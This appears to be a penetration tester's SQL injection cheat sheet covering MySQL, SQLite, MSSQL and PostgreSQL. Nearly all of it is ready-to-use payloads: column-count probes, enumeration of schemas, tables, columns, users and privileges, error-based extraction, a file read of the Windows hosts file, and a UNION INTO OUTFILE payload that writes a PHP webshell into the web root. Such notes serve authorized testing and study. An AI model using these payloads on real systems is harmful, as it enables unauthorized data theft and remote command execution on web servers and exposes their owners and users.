See Sqlmap
UNION#
MySQL#
Column number#
UNION: try until it succeeds
a' union select 1 -- -
a' union select 1,2 -- -
a' union select 1,2,3 -- -
a' union select 1,2,3,4 -- -
...ORDER BY: try until it fails
a' order by 1 -- -
a' order by 2 -- -
a' order by 3 -- -
a' order by 4 -- -
...DB name, table name#
TABLE_SCHEMA is the database name; TABLE_NAME is the table name.
a' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'db_name' -- -
Column name#
a' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'table_name' -- -
User#
a' UNION SELECT 1,user(),3,4 -- -
a' UNION SELECT 1,CURRENT_USER(),3,4 -- -
a' UNION SELECT 1,user,3,4 from mysql.user -- -
Privilege#
a' UNION SELECT 1,grantee,privilege_type,4 FROM information_schema.user_privileges -- -
Where we can read/write file#
a' UNION SELECT 1,variable_name,variable_value,4 FROM information_schema.global_variables where variable_name="secure_file_priv" -- -
Write webshell with union#
a' UNION SELECT '','<?php system($_REQUEST[0]); ?>','','' into outfile '/var/www/html/shell.php'-- -
Sqlite#
Figure out column number#
UNION: try until it succeeds
a' union select 1 -- -
a' union select 1,2 -- -
a' union select 1,2,3 -- -
a' union select 1,2,3,4 -- -
...ORDER BY: try until it fails
a' order by 1 -- -
a' order by 2 -- -
a' order by 3 -- -
a' order by 4 -- -
...Figure out table name#
' UNION SELECT 1,2,3,group_concat(tbl_name) FROM sqlite_master-- -
Figure out table schema#
' UNION SELECT 1,2,3,group_concat(sql) FROM sqlite_master WHERE name='users'-- -
Error based#
MSSQL#
1' AND 1=(SELECT CONCAT_WS(0x3a,column1,column2) FROM TABLE)-- -
1' AND 1=(SELECT column1 FROM TABLE)-- -
Read file
1' AND 1=(SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents)-- -
PostgreSQL#
1' AND 1=CAST((SELECT table_name FROM information_schema.tables LIMIT 1) as INT)-- -
Blind SQL (Boolean and Time)#
See Blind SQLI